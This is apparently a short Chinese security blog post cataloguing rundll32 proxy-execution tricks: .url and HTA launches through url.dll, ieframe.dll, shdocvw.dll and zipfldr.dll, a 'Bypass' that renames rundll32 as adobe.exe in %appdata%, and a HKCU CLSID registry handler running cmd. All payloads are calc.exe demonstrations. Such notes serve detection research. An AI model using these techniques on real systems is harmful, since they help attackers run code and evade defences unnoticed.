rundll32执行 - r34l!ty - 不负勇往
MENU

rundll32执行

August 3, 2018 • Security

calc.url

[InternetShortcut]
URL=file:///c:\windows\system32\calc.exe

Command

rundll32.exe ieframe.dll, OpenURL <path to local URL file>
rundll32.exe url.dll, OpenURL <path to local URL file>
rundll32.exe shdocvw.dll, OpenURL <path to local URL file>

03_shdocvw.png

HTA

rundll32.exe url.dll,OpenURL "local\path\to\harmless.hta"
rundll32.exe url.dll,OpenURLA "local\path\to\harmless.hta"

DYR9yIUVoAEvzEC.jpg

rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe
rundll32 url.dll, FileProtocolHandler calc.exe
rundll32 zipfldr.dll, RouteTheCall calc.exe

4.png

Bypass

copy c:\windows\system32\rundll32.exe %appdata%\Adobe\adobe.exe

%appdata%\adobe\adobe.exe url.dll, OpenURL file://c:\windows\system32\calc.exe
%appdata%\adobe\adobe.exe url.dll, OpenURLA file://c:\windows\system32\calc.exe
%appdata%\adobe\adobe.exe url.dll, FileProtocolHandler calc.exe
%appdata%\adobe\adobe.exe zipfldr.dll, RouteTheCall calc.exe

CLSID

VBS

Set TypeLib = CreateObject('Script.TypeLib')
strGUID = Left(TypeLib.Guid,38)
WScript.Echo strGUID

PowerShell

powershell -ep -C [guid]::NewGuid().Guid

Registry

reg add HKCU\Software\Classes\CLSID\{you clsid}\Shell\Manage\command /ve /t REG_SZ /d "cmd /c calc.exe"

Command

rundll32 url.dll, OpenURL shell::::{you clsid}

reference

Archives QR Code
QR Code for this page
Tipping QR Code